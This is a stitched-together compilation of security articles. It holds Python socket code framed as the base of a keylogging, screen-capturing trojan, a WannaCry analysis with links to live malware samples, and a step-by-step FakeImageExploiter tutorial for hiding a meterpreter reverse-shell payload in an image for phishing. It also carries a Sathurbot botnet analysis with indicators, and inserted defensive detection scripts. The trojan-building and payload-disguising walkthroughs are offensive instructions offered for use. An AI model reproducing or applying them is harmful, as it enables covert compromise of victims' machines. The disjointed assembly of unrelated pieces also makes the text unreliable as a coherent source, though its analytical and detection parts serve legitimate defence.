import socket

# target IP/URL and port
target_host = "127.0.0.1"
target_port = 9999

# create a socket object
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the host
client.connect((target_host, target_port))
# send data
client.send("GET / HTTP/1.1\r\nHOST: 127.0.0.1\r\n\r\n")
# receive the response
response = client.recv(4096)
print response

2) Writing a simple TCP server

# -*- coding: utf-8 -*-
import socket
import threading

# IP and port to listen on
bind_ip = "127.0.0.1"
bind_port = 9999

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip, bind_port)


# handle one client connection
def handle_client(client_socket):
    request = client_socket.recv(1024)
    print "[*] Received: %s" % request
    client_socket.send("ok!")
    client_socket.close()


while True:
    client, addr = server.accept()
    print "[*] Accept connection from: %s:%d" % (addr[0], addr[1])
    client_handler = threading.Thread(target=handle_client, args=(client,))
    client_handler.start()

Start the server listening, Figure 4.

Run the client, Figure 5.

The server receives the client's request and responds, Figure 6.

Figure 6

The last thing to do is to combine the three modules above, and a simple trojan with keylogging and screen capture that can send content to our server is done. You can use py2exe to build the script into an exe. Of course, you can go further and add remote control features.

WannaCry ransomware hit Windows computers worldwide (HACKERSCHINA NEWS)

A massive malicious ransomware-based attack made the headlines on Friday, first targeting UK hospitals and Spanish banks before rapidly spreading worldwide. The news was promptly confirmed by the Spanish telco Telefónica, one of the numerous victims of the ransomware attack. The newspaper El Pais also reported the massive attack, while experts at Telefónica confirmed the systems in its intranet had been infected, adding that the situation was under control. The fixed and mobile telephone services provided by Telefónica were not affected by the ransomware-based attack.

The Spanish CERT issued an alert warning organizations and confirmed that the malware was rapidly spreading.

The ransomware, dubbed WannaCry (aka Wcry, WanaCrypt, WannaCrypt), targeted many other companies in Spain and across the world, including Vodafone, FedEx, and other critical infrastructure.

El Reg reported that 6 NHS health trusts in the UK were taken out by the malware. According to Prime Minister Theresa May, the ransomware “has crippled” UK hospitals; the Government representative also confirmed that the situation was monitored by the intelligence agency GCHQ.

The NHS faced serious problems due to the antiquated nature of its IT infrastructure, which still includes a large number of systems running Windows XP.

“Computers were locked in Aintree, Blackpool, Broomfield Hospital in Essex, Colchester General Hospital, all hospital systems in Derbyshire, Great Yarmouth, East and North Hertfordshire, James Paget Hospital in Norfolk, Lanarkshire, and Leicester,” reported El Reg.

Figure 1 – A computer infected by the WannaCry ransomware

Experts from the security firm Avast detected more than 75,000 attacks in 99 countries; most of the infections were observed in Russia, Ukraine, and Taiwan.

A real-time map of the infections is available at the following address:

https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

Figure 2 – Real Time Infections Map

Source: Ars Technica

A ransomware that leverages the NSA EternalBlue and DoublePulsar exploits

The WannaCry ransomware uses the two NSA exploits EternalBlue and DoublePulsar to infect computers and propagate the threat to any other connected Windows systems on the same network.

Researchers from Kaspersky Lab have confirmed that the WannaCry attack is initiated through an SMBv2 remote code execution in Microsoft Windows.

“It is important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the lack of existence of this vulnerability doesn’t really prevent the ransomware component from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor that caused the outbreak,” reported the analysis from Kaspersky.

Experts highlighted the network worm capabilities that allow the malicious code to spread rapidly.

“The special criticality of this campaign is caused by exploiting the vulnerability described in bulletin MS17-010 using EternalBlue/DoublePulsar, which can infect other connected Windows systems on the same network that are not properly updated. Infection of a single computer can end up compromising the entire corporate network,” states the security alert issued by the Spanish CERT.

“The ransomware, a variant of WannaCry, infects the machine by encrypting all its files and, using the vulnerability mentioned in the previous paragraph that allows the execution of remote commands through Samba (SMB), is distributed to other Windows machines in that same network.”

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

The WannaCry ransomware spreads via SMB; it encrypts the files on the infected machines and charges $300 or $600 in Bitcoin to restore them.

The ransomware can encrypt a wide variety of documents on the infected machines; it also attacks documents stored on any attached storage, and snatches any keys for remote desktop access. The malware deletes volume snapshots and disables system repair tools to make file recovery impossible.

Experts observed the malware determine the victim’s language so as to display the ransom demand in the correct language.

Security experts at the Cisco Talos team have published a detailed analysis of the WannaCry ransomware.

Below is the complete infection process described in the analysis published by the experts at the Talos team:

“An initial file mssecsvc.exe drops and executes the file tasksche.exe. The kill switch domain is then checked. Next, the service mssecsvc2.0 is created. This service executes the file mssecsvc.exe with a different entry point than the initial execution. This second execution checks the IP address of the infected machine and attempts to connect to port 445 TCP of each IP address in the same subnet. When the malware successfully connects to a machine, a connection is initiated, and data is transferred. We believe this network traffic is an exploit payload. It has been widely reported this is exploiting recently disclosed vulnerabilities addressed by Microsoft in bulletin MS17-010. We currently don’t have a complete understanding of the SMB traffic, and exactly what conditions need to be present for it to spread using this method,” states the analysis.
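The propagation step Talos describes, one host opening 445/tcp to every address in its subnet, is a distinctive pattern in firewall or flow logs. The following detector is an added example, not code from the page or from Talos; it runs over constructed flow-log lines (SAMPLE_FLOW_LOG, whose format, window and threshold are assumptions) and reports sources that reach an unusual number of distinct hosts on 445/tcp inside a short window.

```python
from collections import defaultdict

# Constructed flow-log lines in the form "<epoch> <src_ip> <dst_ip> <dst_port> <proto>".
# Host 10.0.5.23 walks its subnet on 445/tcp the way the worm's second stage does;
# 10.0.5.42 talks repeatedly to a single file server, which is normal SMB use.
SAMPLE_FLOW_LOG = "\n".join(
    ["%d 10.0.5.23 10.0.5.%d 445 tcp" % (1494600000 + i, i) for i in range(1, 26)]
    + ["%d 10.0.5.42 10.0.5.200 445 tcp" % (1494600000 + i) for i in range(1, 6)]
    + ["1494600030 10.0.5.42 10.0.5.200 80 tcp"]
)


def parse_flow_line(line):
    """Parse one log line into a dict, or return None for a malformed line."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, src, dst, dport, proto = parts
    try:
        return {"ts": int(ts), "src": src, "dst": dst,
                "dport": int(dport), "proto": proto.lower()}
    except ValueError:
        return None


def detect_smb_sweeps(log_text, window_seconds=60, min_hosts=20):
    """Map each source that contacted at least min_hosts distinct destinations on 445/tcp
    within any window_seconds span to the largest distinct count seen in such a span."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_flow_line(line)
        if rec and rec["dport"] == 445 and rec["proto"] == "tcp":
            by_src[rec["src"]].append((rec["ts"], rec["dst"]))
    sweeps = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span is at most window_seconds
            while events[end][0] - events[start][0] > window_seconds:
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            if distinct >= min_hosts:
                sweeps[src] = max(sweeps.get(src, 0), distinct)
    return sweeps


if __name__ == "__main__":
    for src, n in detect_smb_sweeps(SAMPLE_FLOW_LOG).items():
        print("possible SMB sweep from %s: %d distinct hosts on 445/tcp" % (src, n))
```

Vulnerability scanners and backup servers legitimately fan out on 445 too, so the source is allow-listed by role before an alert pages anyone; the alert is a containment trigger (isolate the host) that complements, rather than replaces, applying MS17-010 and not exposing SMB beyond the segments that need it.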

    “The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as ‘C:/’, ‘D:/’ etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption. While the files are being encrypted, the malware creates a new file directory ‘Tor/’ into which it drops tor.exe and nine dll files used by tor.exe. Additionally, it drops two further files: taskdl.exe & taskse.exe. The former deletes temporary files while the latter launches @wanadecryptor@.exe to display the ransom note on the desktop to the end user. The @wanadecryptor@.exe is not in and of itself the ransomware, only the ransom note. The encryption is performed in the background by tasksche.exe.”

    Experts that want to analyze the WannaCry ransomware can findsampleson the following GitHub repository:

    https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

    the page includes useful information such as the addresses of Bitcoin wallets for the malware.

    The ransomwaredirectsvictims to a page with displaying a QR code at btcfrog, which links to attacker main bitcoin wallet13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.

    Figure 3 – Payment Page displays QR code

    Below Key findings of the threat:

    • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
    • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
    • Ransom: between $300 to $600. There is code to ‘rm’ (delete) files in the virus. Seems to reset if the virus crashes.
    • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: Malwarebytes)
    • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: Malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

    A decrypted sample of the WannaCry ransomware is availablehere:

    https://transfer.sh/ZhnxR/CYBER1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.EXE

    The Kill Switch

    A few hours after the massive attacks security experts started their analysis of the malicious code after a reverse engineering of the samples of the malware available in the wild. The good news emerged from the first investigation is that malware researchers have discovered a kill switch in the ransomware code, a condition that could halt the execution of the code when matched.

    ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

    Figure 4 – Kevin Beaumont Tweet about the kill switch

    The UK experts atMalwareTechBloghave registered the domain after they made a reverse engineering of the code.

    The Kill Switch domain is iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; the domain was sinkholed by law enforcement. To a server in California, and the admins of the infected systems reaching out to the dot-com will be notified, we are told. “IP addresses from our sinkhole have been sent to FBI.

    Figure 5 – Kill Switch domain

    Below the messages displayed when a machine tries to connect it:

    “IP addresses from our sinkhole have been sent to FBI andShadowServerso affected organizations should get a notification soon,”saidthe researcher. The InfoSec bodyadmittedthey registered the domain first, then realized it was a kill switch. Still, job done.”

    Experts from CISCO Talos group made an interesting analysis of the WannaCry ransomware.

    “WannaCry does not appear to only be leveraging the ETERNALBLUE modules associated with this attack framework; it is simply scanning accessible servers for the presence of the DOUBLEPULSAR backdoor. In cases where it identifies a host that has been implanted with this backdoor, it simply leverages the existing backdoor functionality available and uses it to infect the system with WannaCry,” reads the analysis from Talos. “In cases where the system has not been previously compromised and implanted with DOUBLEPULSAR, the malware will use ETERNALBLUE for the initial exploitation of the SMB vulnerability. This is the cause of the worm-like activity that has been widely observed across the internet.”

    Microsoft has published a security advisory for the threat and an emergency patch for Windows XP.

    The IT giant released emergency security patches for Windows Server 2003 (SP2 x64 / x86); Windows XP (SP2 x64, SP3 x86); Windows XP Embedded (SP3, x86); as well as the 32-bit and 64-bit versions of Windows 8.

    Conclusions

    The following aspects of the massive ransomware attack must be carefully considered:

    • This attack demonstrates the risks related to the militarization of cyberspace. Malware, exploit code and hacking tools developed by intelligence agencies and governments can be very dangerous once out of their control.
    • The success of the malware is due to the poor security posture of the victims, who had no awareness of the threat and did not apply the security patches released by Microsoft.
    • Modern critical infrastructure is not resilient to cyber-attacks.

HackersChina Cloud image backdoor bundling tool FakeImageExploiter: Embedded Backdoor with Image using FakeImageExploiter

backdoor.jpg
Here we recommend a security tool called “Fake Image Exploiter”, which bundles a hidden malicious .bat or .exe program into an image file, making it convenient to gain control during phishing or social-engineering attack tests. When the victim clicks the malicious image file, a management (control) session is sent back to the controlling host. A video of its use follows:

https://www.youtube.com/watch?v=4dEYIO-xBHU

In this article we are introducing a newly launched hacking tool, “Fake Image Exploiter”. It is designed so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with a hidden malicious .bat/.exe file inside it.

Let’s start!

Open the terminal inside your Kali Linux and type the following command to download it from GitHub.

git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

Once it is downloaded, open the folder and select the file “settings” for configuration before running the program, as shown in the screenshot.

Now make the following changes inside the settings file, as shown in the screenshot:

Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any extension among these four: ps1, bat, txt, exe. I set PAYLOAD_EXETNSION=bat; similarly set BYPASS_RH=NO and scroll down for the next configuration.

In the same way set these two values as shown in the screenshot, then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making these changes in the settings file, open the terminal and run the program file:

cd FakeImageExploiter

./FakeImageExploiter.sh

Click on YES to execute the framework.

Select the payload to build; I chose windows/meterpreter/reverse_tcp for the attack.

Then a pop-up box opens which allows choosing any jpg image so that the .bat payload can be hidden inside that image.

Now select an icon for your malicious image.

Give a name to your payload which will be displayed to the victim as the file name; in the screenshot you can see I gave “sales”.

Now it generates a link, as you can observe in the highlighted part of the screenshot, and this link is sent to the victim. The victim downloads the zip file and clicks on sales.jpg.

When the victim clicks on sales.jpg, we get a meterpreter session in the background in the Metasploit framework.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

Configuration and use

First, open a Kali terminal and run the download, installation and configuration:

git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

1 (1).png

After the download completes, enter the FakeImageExploiter folder and select the settings file for configuration:

2.png

Here you can choose the format of the payload hidden in the image; four formats are available: ps1, bat, txt and exe. We choose PAYLOAD_EXETNSION=bat. For the option that replaces the icon of the generated bundled image file, we choose BYPASS_RH=NO, i.e. not automatic: the icon of the final generated image must be changed and added manually.

3.png

Likewise, find the following two lines in the settings file and modify them as needed:

AUTO_PAYLOAD_BUILD=YES (option to build the payload automatically)

AGENT_HANLER_PORT=4444 (the port the client listens on after the malicious program is implanted)

4.png

Once the options are configured, the Fake Image Exploiter main program can be launched.

Generating the payload

cd FakeImageExploiter

./FakeImageExploiter.sh

5.png

Select YES to start the payload-generation framework:

6.png

Select the payload that the malicious program bundled in the image should load; here we choose windows/meterpreter/reverse_tcp:

7.png

A prompt then appears where you manually select the jpg image file to be bundled with the .bat payload for disguise:

8.png

and the replacement icon theme for the final image file:

9.png

Next, give the final bundled malicious image file a name:

10.png

FakeImageExploiter finally generates the malicious image file in two places: a .zip file under the root of the local Apache2 web server, and a malicious image file with a hidden extension under the FakeImageExploiter output folder (output). When clicked and executed, the file displays the jpg image while covertly creating a reverse management session back to the controlling host:

11.png

The following is the reverse management session displayed after the control end connects successfully:

12.png

That concludes the tool introduction, but please do not use it for illegal purposes.
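The lure described above relies on the victim seeing an image name while the archive actually carries a batch file (the "hidden extension" case) or an executable dressed up with an image icon. A mail gateway or download scanner can catch both by comparing each archive member's name against its real content type. The following Python is an added defensive example, not code from the original post or from the FakeImageExploiter project; the archive it inspects is constructed in memory and its member names are illustrative.

```python
import io
import os
import zipfile

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
EXEC_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".lnk"}

# Magic bytes that identify the real content type, independent of the file name.
MAGIC = (
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
    (b"BM", "bmp"),
    (b"MZ", "pe"),
)


def sniff(data: bytes) -> str:
    """Classify content by magic bytes; fall back to a few script markers."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    head = data[:512].lower()
    if any(tok in head for tok in (b"@echo", b"powershell", b"cmd.exe", b"wscript")):
        return "script"
    return "unknown"


def suffixes(name: str):
    """All extensions of a member, so 'sales.jpg.bat' -> ['.jpg', '.bat']."""
    parts = os.path.basename(name).lower().split(".")
    return ["." + p for p in parts[1:]]


def inspect_zip(zip_bytes: bytes):
    """Return [(member_name, [reasons])] for members that look like disguised payloads."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            sufs = suffixes(info.filename)
            kind = sniff(zf.read(info.filename))
            reasons = []
            if sufs and sufs[-1] in EXEC_EXTS:
                reasons.append("executable extension " + sufs[-1])
            if any(s in IMAGE_EXTS for s in sufs[:-1]):
                reasons.append("image extension followed by another extension")
            if sufs and sufs[-1] in IMAGE_EXTS and kind in ("pe", "script"):
                reasons.append("image name but " + kind + " content")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive: a real JPEG header, a double-extension batch file,
    and PE bytes stored under an image name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("sales.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)
        zf.writestr("sales.jpg.bat", b"@echo off\r\nrem constructed placeholder, not a payload\r\n")
        zf.writestr("invoice.png", b"MZ\x90\x00" + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in inspect_zip(build_sample_zip()):
        print(name, "->", "; ".join(why))
```

The name check alone is not enough: Explorer hides known extensions by default, so a user sees "sales.jpg" for "sales.jpg.bat", which is exactly why the content sniff is paired with the double-extension test.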


“EternalBlue” ransomware sample download: WannaCry (EternalBlue) computer ransomware and its variants, HackersChina Cloud platform!

We have collected the MD5s of the existing samples from the internet. If the virus sample cannot be downloaded normally from within China, use a circumvention tool or a VPN proxy to download it. Download address:

Sathurbot: Distributed WordPress password attack (HackersChina)

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file, while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice the victim into running the executable, which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted as login:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted by any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used; in particular, the wp.getUsersBlogs method is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even against websites that do not host WordPress, are the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.
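The distinguishing trait of this campaign, as described above, is that each bot makes a single login attempt per site, so per-IP rate thresholds never fire; the useful signal is the number of distinct sources posting to /xmlrpc.php, most of them exactly once, plus /wp-login.php probes arriving at sites that do not run WordPress. The following Python is an added example for web admins, not code from ESET or from the original article; it parses Apache/nginx combined-format access logs, and the sample lines and addresses are constructed.

```python
import re
from collections import Counter

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: four different addresses each POST to xmlrpc.php exactly once,
# which is the one-attempt-per-bot pattern described above; the last line shows a
# wp-login.php probe answered with 404, i.e. a site that does not run WordPress.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Apr/2017:08:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1825 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2017:08:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.17 - - [10/Apr/2017:08:00:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.44 - - [10/Apr/2017:08:00:15 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2017:08:00:20 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Apr/2017:08:00:31 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.17 - - [10/Apr/2017:08:05:09 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""


def parse_access_log(text: str):
    """Yield dicts for well-formed lines; the query string is dropped from the path."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["path"] = rec["path"].split("?", 1)[0]
            yield rec


def probe_summary(text: str, min_sources: int = 3, single_shot_ratio: float = 0.8) -> dict:
    """Summarise XML-RPC and wp-login probing from an access log.

    distributed_pattern is true when at least min_sources distinct addresses posted
    to /xmlrpc.php and (almost) all of them did so only once: a per-IP counter
    would stay below any sensible threshold, a distinct-source counter does not.
    """
    xmlrpc_per_ip = Counter()
    wp_login_ips = set()
    for rec in parse_access_log(text):
        if rec["method"] == "POST" and rec["path"] == "/xmlrpc.php":
            xmlrpc_per_ip[rec["ip"]] += 1
        elif rec["path"] == "/wp-login.php":
            wp_login_ips.add(rec["ip"])
    sources = len(xmlrpc_per_ip)
    single = sum(1 for n in xmlrpc_per_ip.values() if n == 1)
    return {
        "xmlrpc_sources": sources,
        "xmlrpc_single_shot": single,
        "wp_login_sources": len(wp_login_ips),
        "distributed_pattern": sources >= min_sources and single >= single_shot_ratio * sources,
    }


if __name__ == "__main__":
    print(probe_summary(SAMPLE_ACCESS_LOG))
```

The access log does not show which XML-RPC method was called; the request body carries it, so if you need to confirm wp.getUsersBlogs specifically, enable request-body logging at the reverse proxy or match on it in a WAF rule. If the site does not need XML-RPC, the Prevention section's advice to disable it removes this surface entirely.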

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of the rundll32.exe or explorer.exe process and locks files and registry keys from editing. Both 32-bit and 64-bit versions are present in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

